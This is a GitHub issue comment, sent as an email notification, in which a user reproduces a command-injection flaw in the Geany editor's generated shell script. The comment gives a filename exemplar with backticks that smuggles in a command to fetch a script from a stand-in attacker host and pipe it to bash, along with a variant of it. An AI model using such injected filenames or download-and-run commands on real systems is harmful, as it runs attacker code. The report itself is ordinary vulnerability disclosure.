WrapEarnPass left a comment (geany/geany#4611)

My expanded shellscript from geany-2.1 (via debian/testing) does not contain 
the same value as the exemplar.
Exemplar ``` ./test`curl http://evil.example/payload.sh|bash` ```
Capture the shellscript: ```watch -n 0.01 -g 'cat /tmp/geany*.sh 2>&1  >> 
/tmp/watch.sh'```
Local test: ```"./test`curl evil.example|bash`" ```

This however, does still attempt the backtick, as evidenced by the shellscript 
output:

<img width="811" height="229" alt="Image" 
src="https://github.com/user-attachments/assets/2bbca231-a3a8-4d9b-a245-d3c35677380d";
 />

Impact confirmed with modified initial condition.

-- 
Reply to this email directly or view it on GitHub:
https://github.com/geany/geany/issues/4611#issuecomment-4845081744
You are receiving this because you are subscribed to this thread.

Message ID: <geany/geany/issues/4611/[email protected]>

Reply via email to